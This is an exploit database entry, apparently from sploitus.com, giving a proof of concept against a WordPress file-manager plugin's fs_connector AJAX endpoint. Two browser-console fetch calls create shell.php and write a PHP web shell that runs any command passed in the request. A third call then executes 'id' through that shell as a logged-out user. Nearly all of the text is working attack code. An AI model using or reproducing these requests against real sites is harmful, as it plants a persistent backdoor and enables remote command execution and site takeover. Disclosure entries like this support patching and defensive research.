Share
## https://sploitus.com/exploit?id=WPEX-ID:D4DAF0E1-8018-448A-964C-427A355E005F
As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );

Now a logged-out attacker may access `shell.php` as follows:

await (await fetch( "/shell.php?cmd=id" ) ).text()